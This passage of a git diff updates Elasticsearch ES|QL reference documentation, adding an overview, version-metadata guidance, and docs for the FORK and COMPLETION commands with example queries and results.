"{42FC7E13-CBCB-5C05-0000-0010A0395401}", - "executable": "C:\\Windows\\System32\\regsvr32.exe" - }, - "@timestamp": 131883573238680000, - "destination": { - "address": "151.101.48.133", - "port": "443" - }, - "source": { - "address": "192.168.162.134", - "port": "50505" - }, - "event": { - "category": "network" - }, - "user": { - "full_name": "bob", - "domain": "ART-DESKTOP", - "id": "ART-DESKTOP\\bob" - }, - "network": { - "protocol": "tcp", - "direction": "outbound" - } - } - } - ] - } - ] - } -} -``` - diff --git a/docs/reference/query-languages/esql.md b/docs/reference/query-languages/esql.md index 034794af7d8e9..df3a502bdd33f 100644 --- a/docs/reference/query-languages/esql.md +++ b/docs/reference/query-languages/esql.md @@ -2,22 +2,48 @@ navigation_title: "{{esql}}" mapped_pages: - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-language.html + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql.html + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-getting-started.html + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-using.html + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-examples.html +products: + - id: elasticsearch --- # {{esql}} reference [esql-language] -:::{note} -This section provides detailed **reference information** about the {{esql}} language, including syntax, functions, and operators. +**Elasticsearch Query Language ({{esql}})** is a piped query language for filtering, transforming, and analyzing data. -For overview, conceptual, and getting started information, refer to the [{{esql}} language overview](docs-content://explore-analyze/query-filter/languages/esql.md) in the **Explore and analyze** section. -::: +## What's {{esql}}? [_the_esql_compute_engine] -{{esql}} is a piped query language for exploring and analyzing data in {{es}}. 
It is designed to be easy to use and understand, while also being powerful enough to handle complex data processing.
+You can author {{esql}} queries to find specific events, perform statistical analysis, and create visualizations. It supports a wide range of commands, functions, and operators to perform various data operations, such as filtering, aggregation, and time-series analysis. It initially supported a subset of the features available in Query DSL, but it is rapidly evolving with every {{serverless-full}} and Stack release.
-This reference section provides detailed technical information about {{esql}} features, syntax, and behavior:
+{{esql}} is designed to be easy to read and write, making it accessible for users with varying levels of technical expertise. It is particularly useful for data analysts, security professionals, and developers who need to work with large datasets in Elasticsearch.
+
+## How does it work? [search-analyze-data-esql]
+
+{{esql}} uses pipes (`|`) to manipulate and transform data in a step-by-step fashion. This approach allows you to compose a series of operations, where the output of one operation becomes the input for the next, enabling complex data transformations and analysis.
+
+Here's a simple example of an {{esql}} query:
+
+```esql
+FROM sample_data
+| SORT @timestamp DESC
+| LIMIT 3
+```
+
+Note that each line in the query represents a step in the data processing pipeline:
+- The `FROM` clause specifies the index or data stream to query
+- The `SORT` clause sorts the data by the `@timestamp` field in descending order
+- The `LIMIT` clause restricts the output to the top 3 results
+
+### User interfaces
+
+You can interact with {{esql}} in two ways:
+
+- **Programmatic access**: Use {{esql}} syntax with the {{es}} `_query` endpoint.
  - Refer to [](esql/esql-rest.md)
+
+- **Interactive interfaces**: Work with {{esql}} through Elastic user interfaces including Kibana Discover, Dashboards, Dev Tools, and analysis tools in Elastic Security and Observability.
+  - Refer to [Using {{esql}} in {{kib}}](docs-content://explore-analyze/query-filter/languages/esql-kibana.md).
-* [Syntax reference](esql/esql-syntax-reference.md): Learn the basic syntax of commands, functions, and operators
-* [Advanced workflows](esql/esql-advanced.md): Learn how to handle more complex tasks with these guides, including how to extract, transform, and combine data from multiple indices
-* [Types and fields](esql/esql-types-and-fields.md): Learn about how {{esql}} handles different data types and special fields
-* [Limitations](esql/limitations.md): Learn about the current limitations of {{esql}}
-* [Examples](esql/esql-examples.md): Explore some example queries
\ No newline at end of file
diff --git a/docs/reference/query-languages/esql/README.md b/docs/reference/query-languages/esql/README.md
index 8e0d1a3835d4b..67613be559289 100644
--- a/docs/reference/query-languages/esql/README.md
+++ b/docs/reference/query-languages/esql/README.md
@@ -105,16 +105,95 @@ To help differentiate between the static and generated content, the generated co
 % This is generated by ESQL's AbstractFunctionTestCase. Do no edit it. See ../README.md for how to regenerate it.
 
+## Version differentiation in Docs V3
+
+> [!IMPORTANT]
+> Starting with 9.0, we no longer publish separate documentation branches for every minor release (`9.0`, `9.1`, `9.2`, etc.).
+> This means there won't be a different page for `9.1`, `9.2`, and so on.
Instead, all changes landing in subsequent minor releases **will appear on the same page**.
+
+Because we now publish just one docs set off of the `main` branch, we use the [`applies_to` metadata](https://elastic.github.io/docs-builder/syntax/applies/) to differentiate features and their availability across different versions. This is a [cumulative approach](https://elastic.github.io/docs-builder/contribute/#cumulative-docs): instead of creating separate pages for each product and release, we update a **single page** with product- and version-specific details over time.
+
+`applies_to` allows us to clearly communicate when features are introduced, when they transition from preview to GA, and which versions support specific functionality.
+
+This metadata accepts a lifecycle and an optional version.
+
+### Functions and operators
+
+Use the `@FunctionAppliesTo` annotation within the `@FunctionInfo` annotation on function and operator classes to specify the lifecycle and version for functions and operators.
+
+For example, to indicate that a function is in technical preview and applies to version 9.0.0, you would use:
+
+```java
+@FunctionInfo(
+    returnType = "boolean",
+    appliesTo = {
+        @FunctionAppliesTo(lifeCycle = FunctionAppliesToLifecycle.PREVIEW, version = "9.0.0")
+    },
+    ...
+)
+```
+
+When a feature evolves from preview in `9.0` to GA in `9.2`, add a new entry alongside the existing preview entry and remove the `preview = true` boolean:
+
+```java
+@FunctionInfo(
+    returnType = "boolean",
+    preview = false, // the preview boolean can be removed (or flipped to false) when the function becomes GA
+    appliesTo = {
+        @FunctionAppliesTo(lifeCycle = FunctionAppliesToLifecycle.PREVIEW, version = "9.0.0"),
+        @FunctionAppliesTo(lifeCycle = FunctionAppliesToLifecycle.GA, version = "9.2.0")
+    },
+    ...
+)
+```
+
+We updated [`DocsV3Support.java`](https://github.com/elastic/elasticsearch/blob/main/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/DocsV3Support.java) to generate the `applies_to` metadata correctly for functions and operators.
+
+### Inline `applies_to` metadata
+
+Use [inline annotations](https://elastic.github.io/docs-builder/syntax/applies/#inline-annotations) to specify `applies_to` metadata in descriptions, parameter lists, etc.
+
+For example, the second item in this list is in technical preview as of version 9.2:
+
+```markdown
+- Item 1
+- Item 2 {applies_to}`stack: preview 9.2`
+```
+
+### Key rules
+
+1. **Use the `preview = true` boolean** for any tech preview feature - this is required for the Kibana inline docs
+   - **Remove `preview = true`** only when the feature becomes GA on serverless and is _definitely_ going GA in the next minor release
+2. **Never delete `appliesTo` entries** - only add new ones as features evolve from preview to GA
+3. **Use specific versions** (`9.0.0`, `9.1.0`) when known, or just `PREVIEW` without a version if timing is uncertain
+4. **Add `applies_to` to examples** where necessary
+
+> [!IMPORTANT]
+> We don't use `applies_to` in the legacy asciidoc system for 8.x and earlier versions.
+
+### Supported lifecycles
+
+- `PREVIEW` - Feature is in technical preview
+- `GA` - Feature is generally available
+- `DEPRECATED` - Feature is deprecated and will be removed in a future release
+- `UNAVAILABLE` - Feature is not available in the current version, but may be available in future releases
+
+> [!NOTE]
+> Unreleased version information is automatically sanitized in the docs build output.
For example, say you specify `preview 9.3.0`:
+> - Before `9.3.0` is released, the live documentation will display "Planned for a future release" instead of the specific version number.
+> - This will be updated automatically when the version is released.
+
 ## Tutorials
 
 ### Adding a new command
 
 When adding a new command, for example adding the `CHANGE_POINT` command, do the following:
 
 1. Create a new file in the `_snippets/commands/layout` directory with the name of the command, for example `change_point.md`.
-2. Add the content for the command to the file. See other files in this directory for examples.
-3. Add the command to the list in `_snippets/lists/processing-commands.md`.
-4. Add an include directive to the `commands/processing-commands.md` file to include the new command.
-5. Add tested examples to the `_snippets/commands/examples` directory. See below for details.
+2. Make sure to specify which versions the command applies to. See [Version differentiation in Docs V3](#version-differentiation-in-docs-v3) for details. [Example PR](https://github.com/elastic/elasticsearch/pull/130314/files#diff-0ab90b6202c5d9eeea75dc95a7cb71dc4d720230342718bff887816771a5a803R3-R6).
+3. Add the content for the command to the file. See other files in this directory for examples.
+4. Add the command to the list in `_snippets/lists/processing-commands.md`.
+5. Add an include directive to the `commands/processing-commands.md` file to include the new command.
+6. Add tested examples to the `_snippets/commands/examples` directory. See below for details.
 
 ### Adding examples to commands
 
diff --git a/docs/reference/query-languages/esql/_snippets/commands/examples/fork.csv-spec/simpleFork.md b/docs/reference/query-languages/esql/_snippets/commands/examples/fork.csv-spec/simpleFork.md
new file mode 100644
index 0000000000000..c4752cb9648c6
--- /dev/null
+++ b/docs/reference/query-languages/esql/_snippets/commands/examples/fork.csv-spec/simpleFork.md
@@ -0,0 +1,14 @@
+% This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it.
+
+```esql
+FROM employees
+| FORK ( WHERE emp_no == 10001 )
+       ( WHERE emp_no == 10002 )
+| KEEP emp_no, _fork
+| SORT emp_no
+```
+
+| emp_no:integer | _fork:keyword |
+| --- | --- |
+| 10001 | fork1 |
+| 10002 | fork2 |
diff --git a/docs/reference/query-languages/esql/_snippets/commands/examples/fork.csv-spec/simpleForkWithStats.md b/docs/reference/query-languages/esql/_snippets/commands/examples/fork.csv-spec/simpleForkWithStats.md
new file mode 100644
index 0000000000000..d72ea42b3106f
--- /dev/null
+++ b/docs/reference/query-languages/esql/_snippets/commands/examples/fork.csv-spec/simpleForkWithStats.md
@@ -0,0 +1,19 @@
+% This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it.
+
+```esql
+FROM books METADATA _score
+| WHERE author:"Faulkner"
+| EVAL score = round(_score, 2)
+| FORK (SORT score DESC, author | LIMIT 5 | KEEP author, score)
+       (STATS total = COUNT(*))
+| SORT _fork, score DESC, author
+```
+
+| author:text | score:double | _fork:keyword | total:long |
+| --- | --- | --- | --- |
+| William Faulkner | 2.39 | fork1 | null |
+| William Faulkner | 2.39 | fork1 | null |
+| Colleen Faulkner | 1.59 | fork1 | null |
+| Danny Faulkner | 1.59 | fork1 | null |
+| Keith Faulkner | 1.59 | fork1 | null |
+| null | null | fork2 | 18 |
diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/change_point.md b/docs/reference/query-languages/esql/_snippets/commands/layout/change_point.md
index da7a8497e8d6b..3aa8810497aba 100644
--- a/docs/reference/query-languages/esql/_snippets/commands/layout/change_point.md
+++ b/docs/reference/query-languages/esql/_snippets/commands/layout/change_point.md
@@ -1,14 +1,12 @@
-## `CHANGE_POINT` [esql-change_point]
-
-:::{note}
-The `CHANGE_POINT` command requires a [platinum license](https://www.elastic.co/subscriptions).
-:::
-
 ```yaml {applies_to}
 serverless: preview
 stack: preview 9.1.0
 ```
 
+:::{note}
+The `CHANGE_POINT` command requires a [platinum license](https://www.elastic.co/subscriptions).
+:::
+
 `CHANGE_POINT` detects spikes, dips, and change points in a metric.
 
 **Syntax**
diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/completion.md b/docs/reference/query-languages/esql/_snippets/commands/layout/completion.md
new file mode 100644
index 0000000000000..cf1ade8d3c6f0
--- /dev/null
+++ b/docs/reference/query-languages/esql/_snippets/commands/layout/completion.md
@@ -0,0 +1,105 @@
+
+```yaml {applies_to}
+serverless: preview
+stack: preview 9.1.0
+```
+
+The `COMPLETION` command allows you to send prompts and context to a Large Language Model (LLM) directly within your ES|QL queries to perform text generation tasks.
+
+**Syntax**
+
+```esql
+COMPLETION [column =] prompt WITH inference_id
+```
+
+**Parameters**
+
+`column`
+: (Optional) The name of the output column containing the LLM's response.
+  If not specified, the results will be stored in a column named `completion`.
+  If the specified column already exists, it will be overwritten with the new results.
+
+`prompt`
+: The input text or expression used to prompt the LLM.
+  This can be a string literal or a reference to a column containing text.
+
+`inference_id`
+: The ID of the [inference endpoint](docs-content://explore-analyze/elastic-inference/inference-api.md) to use for the task.
+  The inference endpoint must be configured with the `completion` task type.
+
+**Description**
+
+The `COMPLETION` command provides a general-purpose interface for
+text generation tasks using a Large Language Model (LLM) in ES|QL.
+
+`COMPLETION` supports a wide range of text generation tasks. Depending on your
+prompt and the model you use, you can perform arbitrary tasks,
+including:
+
+- Question answering
+- Summarization
+- Translation
+- Content rewriting
+- Creative generation
+
+**Requirements**
+
+To use this command, you must deploy your LLM in Elasticsearch as
+an [inference endpoint](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put) with the
+task type `completion`.
+
+**Examples**
+
+Use the default column name (results stored in `completion` column):
+
+```esql
+ROW question = "What is Elasticsearch?"
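+// each row's "question" value is sent as the prompt to the "test_completion_model"
+// inference endpoint; since no output column is named, the response is stored in "completion"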
+| COMPLETION question WITH test_completion_model
+| KEEP question, completion
+```
+
+| question:keyword | completion:keyword |
+|------------------------|-------------------------------------------|
+| What is Elasticsearch? | A distributed search and analytics engine |
+
+Specify the output column (results stored in `answer` column):
+
+```esql
+ROW question = "What is Elasticsearch?"
+| COMPLETION answer = question WITH test_completion_model
+| KEEP question, answer
+```
+
+| question:keyword | answer:keyword |
+| --- | --- |
+| What is Elasticsearch? | A distributed search and analytics engine |
+
+Summarize the top 10 highest-rated movies using a prompt:
+
+```esql
+FROM movies
+| SORT rating DESC
+| LIMIT 10
+| EVAL prompt = CONCAT(
+    "Summarize this movie using the following information: \n",
+    "Title: ", title, "\n",
+    "Synopsis: ", synopsis, "\n",
+    "Actors: ", MV_CONCAT(actors, ", "), "\n"
+  )
+| COMPLETION summary = prompt WITH test_completion_model
+| KEEP title, summary, rating
+```
+
+
+| title:keyword | summary:keyword | rating:double |
+| --- | --- | --- |
+| The Shawshank Redemption | A tale of hope and redemption in prison. | 9.3 |
+| The Godfather | A mafia family's rise and fall. | 9.2 |
+| The Dark Knight | Batman battles the Joker in Gotham. | 9.0 |
+| Pulp Fiction | Interconnected crime stories with dark humor. | 8.9 |
+| Fight Club | A man starts an underground fight club. | 8.8 |
+| Inception | A thief steals secrets through dreams. | 8.8 |
+| The Matrix | A hacker discovers reality is a simulation. | 8.7 |
+| Parasite | Class conflict between two families. | 8.6 |
+| Interstellar | A team explores space to save humanity. | 8.6 |
+| The Prestige | Rival magicians engage in dangerous competition. | 8.5 |
diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/dissect.md b/docs/reference/query-languages/esql/_snippets/commands/layout/dissect.md
index 79dd91b9f1800..da9eebcbfc7eb 100644
--- a/docs/reference/query-languages/esql/_snippets/commands/layout/dissect.md
+++ b/docs/reference/query-languages/esql/_snippets/commands/layout/dissect.md
@@ -1,4 +1,7 @@
-## `DISSECT` [esql-dissect]
+```yaml {applies_to}
+serverless: ga
+stack: ga
+```
 
 `DISSECT` enables you to [extract structured data out of a string](/reference/query-languages/esql/esql-process-data-with-dissect-grok.md).
diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/drop.md b/docs/reference/query-languages/esql/_snippets/commands/layout/drop.md
index 4f383d4f0f237..32aabf25278c9 100644
--- a/docs/reference/query-languages/esql/_snippets/commands/layout/drop.md
+++ b/docs/reference/query-languages/esql/_snippets/commands/layout/drop.md
@@ -1,4 +1,7 @@
-## `DROP` [esql-drop]
+```yaml {applies_to}
+serverless: ga
+stack: ga
+```
 
 The `DROP` processing command removes one or more columns.
diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/enrich.md b/docs/reference/query-languages/esql/_snippets/commands/layout/enrich.md
index f33491d447482..854f7d5285481 100644
--- a/docs/reference/query-languages/esql/_snippets/commands/layout/enrich.md
+++ b/docs/reference/query-languages/esql/_snippets/commands/layout/enrich.md
@@ -1,4 +1,7 @@
-## `ENRICH` [esql-enrich]
+```yaml {applies_to}
+serverless: ga
+stack: ga
+```
 
 `ENRICH` enables you to add data from existing indices as new columns using an enrich policy.
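As a quick illustration of the command's shape, here is a minimal sketch. It assumes a hypothetical `languages_policy` enrich policy (already created and executed) that matches on `language_code` and adds a `language_name` column:

```esql
ROW language_code = "1"
| ENRICH languages_policy ON language_code WITH language_name
```

The match field, optional `ON` clause, and optional `WITH` renames follow the syntax shown in the hunk below.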
@@ -19,7 +22,7 @@ ENRICH policy [ON match_field] [WITH [new_name1 = ]field1, [new_name2 = ]field2,
 
 `mode`
 : The mode of the enrich command in cross cluster {{esql}}.
-  See [enrich across clusters](docs-content://explore-analyze/query-filter/languages/esql-cross-clusters.md#ccq-enrich).
+  See [enrich across clusters](/reference/query-languages/esql/esql-cross-clusters.md#ccq-enrich).
 
 `match_field`
 : The match field. `ENRICH` uses its value to look for records in the enrich
diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/eval.md b/docs/reference/query-languages/esql/_snippets/commands/layout/eval.md
index cd10448444ebd..a8a39adec2dc5 100644
--- a/docs/reference/query-languages/esql/_snippets/commands/layout/eval.md
+++ b/docs/reference/query-languages/esql/_snippets/commands/layout/eval.md
@@ -1,4 +1,7 @@
-## `EVAL` [esql-eval]
+```yaml {applies_to}
+serverless: ga
+stack: ga
+```
 
 The `EVAL` processing command enables you to append new columns with calculated values.
diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/fork.md b/docs/reference/query-languages/esql/_snippets/commands/layout/fork.md
new file mode 100644
index 0000000000000..559afacc5940e
--- /dev/null
+++ b/docs/reference/query-languages/esql/_snippets/commands/layout/fork.md
@@ -0,0 +1,57 @@
+```yaml {applies_to}
+serverless: preview
+stack: preview 9.1.0
+```
+
+The `FORK` processing command creates multiple execution branches to operate
+on the same input data and combines the results in a single output table.
+
+**Syntax**
+
+```esql
+FORK ( <processing_commands> ) ( <processing_commands> ) ... ( <processing_commands> )
+```
+
+**Description**
+
+The `FORK` processing command creates multiple execution branches to operate
+on the same input data and combines the results in a single output table. A discriminator column (`_fork`) is added to identify which branch each row came from.
+
+**Branch identification:**
+- The `_fork` column identifies each branch with values like `fork1`, `fork2`, `fork3`
+- Values correspond to the order branches are defined
+- `fork1` always indicates the first branch
+
+**Column handling:**
+- `FORK` branches can output different columns
+- Columns with the same name must have the same data type across all branches
+- Missing columns are filled with `null` values
+
+**Row ordering:**
+- `FORK` preserves row order within each branch
+- Rows from different branches may be interleaved
+- Use `SORT _fork` to group results by branch
+
+::::{note}
+`FORK` branches default to `LIMIT 1000` if no `LIMIT` is provided.
+::::
+
+**Limitations**
+
+- `FORK` supports at most 8 execution branches.
+- Using remote cluster references and `FORK` is not supported.
+- Using more than one `FORK` command in a query is not supported.
+
+**Examples**
+
+In the following example, each `FORK` branch returns one row.
+Notice how `FORK` adds a `_fork` column that indicates which branch each row originates from:
+
+:::{include} ../examples/fork.csv-spec/simpleFork.md
+:::
+
+The next example returns the total number of rows that match the query,
+along with the top five rows sorted by score.
+
+:::{include} ../examples/fork.csv-spec/simpleForkWithStats.md
+:::
diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/from.md b/docs/reference/query-languages/esql/_snippets/commands/layout/from.md
index 45dce9136a029..6a5d6c2387d19 100644
--- a/docs/reference/query-languages/esql/_snippets/commands/layout/from.md
+++ b/docs/reference/query-languages/esql/_snippets/commands/layout/from.md
@@ -1,4 +1,7 @@
-## `FROM` [esql-from]
+```yaml {applies_to}
+serverless: ga
+stack: ga
+```
 
 The `FROM` source command returns a table with data from a data stream, index, or alias.
@@ -56,14 +59,14 @@
 ```
 
 Use comma-separated lists or wildcards to
-[query multiple data streams, indices, or aliases](docs-content://explore-analyze/query-filter/languages/esql-multi-index.md):
+[query multiple data streams, indices, or aliases](/reference/query-languages/esql/esql-multi-index.md):
 
 ```esql
 FROM employees-00001,other-employees-*
 ```
 
 Use the format `<remote_cluster_name>:<target>` to
-[query data streams and indices on remote clusters](docs-content://explore-analyze/query-filter/languages/esql-cross-clusters.md):
+[query data streams and indices on remote clusters](/reference/query-languages/esql/esql-cross-clusters.md):
 
 ```esql
 FROM cluster_one:employees-00001,cluster_two:other-employees-*
 ```
diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/grok.md b/docs/reference/query-languages/esql/_snippets/commands/layout/grok.md
index 6397eea898469..313eb8c2ce502 100644
--- a/docs/reference/query-languages/esql/_snippets/commands/layout/grok.md
+++ b/docs/reference/query-languages/esql/_snippets/commands/layout/grok.md
@@ -1,4 +1,7 @@
-## `GROK` [esql-grok]
+```yaml {applies_to}
+serverless: ga
+stack: ga
+```
 
 `GROK` enables you to [extract structured data out of a string](/reference/query-languages/esql/esql-process-data-with-dissect-grok.md).
diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/keep.md b/docs/reference/query-languages/esql/_snippets/commands/layout/keep.md
index 3f2a357d037eb..2c074712e3151 100644
--- a/docs/reference/query-languages/esql/_snippets/commands/layout/keep.md
+++ b/docs/reference/query-languages/esql/_snippets/commands/layout/keep.md
@@ -1,4 +1,7 @@
-## `KEEP` [esql-keep]
+```yaml {applies_to}
+serverless: ga
+stack: ga
+```
 
 The `KEEP` processing command enables you to specify what columns are returned and the order in which they are returned.
diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/limit.md b/docs/reference/query-languages/esql/_snippets/commands/layout/limit.md
index 9bc8d0d86c096..c0646dd782114 100644
--- a/docs/reference/query-languages/esql/_snippets/commands/layout/limit.md
+++ b/docs/reference/query-languages/esql/_snippets/commands/layout/limit.md
@@ -1,4 +1,7 @@
-## `LIMIT` [esql-limit]
+```yaml {applies_to}
+serverless: ga
+stack: ga
+```
 
 The `LIMIT` processing command enables you to limit the number of rows that are returned.
diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/lookup-join.md b/docs/reference/query-languages/esql/_snippets/commands/layout/lookup-join.md
index da99cc69c031a..0ff2232e266cb 100644
--- a/docs/reference/query-languages/esql/_snippets/commands/layout/lookup-join.md
+++ b/docs/reference/query-languages/esql/_snippets/commands/layout/lookup-join.md
@@ -1,5 +1,3 @@
-## `LOOKUP JOIN` [esql-lookup-join]
-
 ```yaml {applies_to}
 stack: preview 9.0.0, ga 9.1.0
 ```
@@ -42,6 +40,9 @@ results, the output will contain one row for each matching combination.
For important information about using `LOOKUP JOIN`, refer to [Usage notes](../../../../esql/esql-lookup-join.md#usage-notes). :::: +:::{include} ../types/lookup-join.md +::: + **Examples** **IP Threat correlation**: This query would allow you to see if any source diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/mv_expand.md b/docs/reference/query-languages/esql/_snippets/commands/layout/mv_expand.md index 3e204a2a3d1be..ce615913ff322 100644 --- a/docs/reference/query-languages/esql/_snippets/commands/layout/mv_expand.md +++ b/docs/reference/query-languages/esql/_snippets/commands/layout/mv_expand.md @@ -1,12 +1,7 @@ -## `MV_EXPAND` [esql-mv_expand] - -::::{warning} -This functionality is in technical preview and may be -changed or removed in a future release. Elastic will work to fix any -issues, but features in technical preview are not subject to the support -SLA of official GA features. -:::: - +```yaml {applies_to} +serverless: preview +stack: preview +``` The `MV_EXPAND` processing command expands multivalued columns into one row per value, duplicating other columns. diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/rename.md b/docs/reference/query-languages/esql/_snippets/commands/layout/rename.md index 5bcade39660e7..3b3648add7b9e 100644 --- a/docs/reference/query-languages/esql/_snippets/commands/layout/rename.md +++ b/docs/reference/query-languages/esql/_snippets/commands/layout/rename.md @@ -1,4 +1,7 @@ -## `RENAME` [esql-rename] +```yaml {applies_to} +serverless: ga +stack: ga +``` The `RENAME` processing command renames one or more columns. diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/row.md b/docs/reference/query-languages/esql/_snippets/commands/layout/row.md index ebbede74ab44d..ce28abccfae90 100644 --- a/docs/reference/query-languages/esql/_snippets/commands/layout/row.md +++ b/docs/reference/query-languages/esql/_snippets/commands/layout/row.md @@ -1,4 +1,7 @@ -## `ROW` [esql-row] +```yaml {applies_to} +serverless: ga +stack: ga +``` The `ROW` source command produces a row with one or more columns with values that you specify. This can be useful for testing. diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/sample.md b/docs/reference/query-languages/esql/_snippets/commands/layout/sample.md index 07d95a31bbcf3..f0ae9e0d37cff 100644 --- a/docs/reference/query-languages/esql/_snippets/commands/layout/sample.md +++ b/docs/reference/query-languages/esql/_snippets/commands/layout/sample.md @@ -1,5 +1,3 @@ -## `SAMPLE` [esql-sample] - ```yaml {applies_to} serverless: preview stack: preview 9.1.0 diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/show.md b/docs/reference/query-languages/esql/_snippets/commands/layout/show.md index 04782a8cc990b..0083282e68610 100644 --- a/docs/reference/query-languages/esql/_snippets/commands/layout/show.md +++ b/docs/reference/query-languages/esql/_snippets/commands/layout/show.md @@ -1,4 +1,7 @@ -## `SHOW` [esql-show] +```yaml {applies_to} +serverless: ga +stack: ga +``` The `SHOW` source command returns information about the deployment and its capabilities. 
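As a quick sketch of its use, `SHOW INFO` returns the deployment's version, build date, and hash:

```esql
SHOW INFO
```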
diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/sort.md b/docs/reference/query-languages/esql/_snippets/commands/layout/sort.md index 61ddd45fc1ff2..63223a0dfa15b 100644 --- a/docs/reference/query-languages/esql/_snippets/commands/layout/sort.md +++ b/docs/reference/query-languages/esql/_snippets/commands/layout/sort.md @@ -1,4 +1,7 @@ -## `SORT` [esql-sort] +```yaml {applies_to} +serverless: ga +stack: ga +``` The `SORT` processing command sorts a table on one or more columns. diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/stats-by.md b/docs/reference/query-languages/esql/_snippets/commands/layout/stats-by.md index c8a5899f6c5ef..4f694b9db59d0 100644 --- a/docs/reference/query-languages/esql/_snippets/commands/layout/stats-by.md +++ b/docs/reference/query-languages/esql/_snippets/commands/layout/stats-by.md @@ -1,4 +1,7 @@ -## `STATS` [esql-stats-by] +```yaml {applies_to} +serverless: ga +stack: ga +``` The `STATS` processing command groups rows according to a common value and calculates one or more aggregated values over the grouped rows. diff --git a/docs/reference/query-languages/esql/_snippets/commands/layout/where.md b/docs/reference/query-languages/esql/_snippets/commands/layout/where.md index 5038ebd647ce1..1fed1b2cf98d9 100644 --- a/docs/reference/query-languages/esql/_snippets/commands/layout/where.md +++ b/docs/reference/query-languages/esql/_snippets/commands/layout/where.md @@ -1,4 +1,7 @@ -## `WHERE` [esql-where] +```yaml {applies_to} +serverless: ga +stack: ga +``` The `WHERE` processing command produces a table that contains all the rows from the input table for which the provided condition evaluates to `true`. diff --git a/docs/reference/query-languages/esql/_snippets/commands/types/lookup-join.md b/docs/reference/query-languages/esql/_snippets/commands/types/lookup-join.md new file mode 100644 index 0000000000000..3e54f0ad66277 --- /dev/null +++ b/docs/reference/query-languages/esql/_snippets/commands/types/lookup-join.md @@ -0,0 +1,21 @@ +% This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it. 
+ +**Supported types** + +| field from the left index | field from the lookup index | +| --- | --- | +| boolean | boolean | +| byte | half_float, float, double, scaled_float, byte, short, integer, long | +| date | date | +| date_nanos | date_nanos | +| double | half_float, float, double, scaled_float, byte, short, integer, long | +| float | half_float, float, double, scaled_float, byte, short, integer, long | +| half_float | half_float, float, double, scaled_float, byte, short, integer, long | +| integer | half_float, float, double, scaled_float, byte, short, integer, long | +| ip | ip | +| keyword | keyword | +| long | half_float, float, double, scaled_float, byte, short, integer, long | +| scaled_float | half_float, float, double, scaled_float, byte, short, integer, long | +| short | half_float, float, double, scaled_float, byte, short, integer, long | +| text | keyword | + diff --git a/docs/reference/query-languages/esql/_snippets/common/result-set-size-limitation.md b/docs/reference/query-languages/esql/_snippets/common/result-set-size-limitation.md index 1a6b4dada3dd7..64912b9450a33 100644 --- a/docs/reference/query-languages/esql/_snippets/common/result-set-size-limitation.md +++ b/docs/reference/query-languages/esql/_snippets/common/result-set-size-limitation.md @@ -11,8 +11,8 @@ Queries do not return more than 10,000 rows, regardless of the `LIMIT` command To overcome this limitation: -* Reduce the result set size by modifying the query to only return relevant data. Use [`WHERE`](/reference/query-languages/esql/commands/processing-commands.md#esql-where) to select a smaller subset of the data. -* Shift any post-query processing to the query itself. You can use the {{esql}} [`STATS`](/reference/query-languages/esql/commands/processing-commands.md#esql-stats-by) command to aggregate data in the query. +* Reduce the result set size by modifying the query to only return relevant data. Use [`WHERE`](/reference/query-languages/esql/commands/where.md) to select a smaller subset of the data. +* Shift any post-query processing to the query itself. You can use the {{esql}} [`STATS`](/reference/query-languages/esql/commands/stats-by.md) command to aggregate data in the query. The upper limit only applies to the number of rows that are output by the query, not to the number of documents it processes: the query runs on the full data set. diff --git a/docs/reference/query-languages/esql/_snippets/functions/description/copy_sign.md b/docs/reference/query-languages/esql/_snippets/functions/description/copy_sign.md new file mode 100644 index 0000000000000..54ab4a25f48c8 --- /dev/null +++ b/docs/reference/query-languages/esql/_snippets/functions/description/copy_sign.md @@ -0,0 +1,6 @@ +% This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it. + +**Description** + +Returns a value with the magnitude of the first argument and the sign of the second argument. This function is similar to Java's Math.copySign(double magnitude, double sign) which is similar to `copysign` from [IEEE 754](https://en.wikipedia.org/wiki/IEEE_754). + diff --git a/docs/reference/query-languages/esql/_snippets/functions/description/knn.md b/docs/reference/query-languages/esql/_snippets/functions/description/knn.md new file mode 100644 index 0000000000000..c39604bbf1fa6 --- /dev/null +++ b/docs/reference/query-languages/esql/_snippets/functions/description/knn.md @@ -0,0 +1,6 @@ +% This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. 
See ../README.md for how to regenerate it.
+
+**Description**
+
+Finds the k nearest vectors to a query vector, as measured by a similarity metric. The knn function finds nearest vectors through approximate search on indexed dense_vectors.
+
diff --git a/docs/reference/query-languages/esql/_snippets/functions/description/md5.md b/docs/reference/query-languages/esql/_snippets/functions/description/md5.md
index 976d3e48a6bfa..cf702ee523749 100644
--- a/docs/reference/query-languages/esql/_snippets/functions/description/md5.md
+++ b/docs/reference/query-languages/esql/_snippets/functions/description/md5.md
@@ -2,5 +2,5 @@
 **Description**
 
-Computes the MD5 hash of the input.
+Computes the MD5 hash of the input (if the MD5 hash is available on the JVM).
 
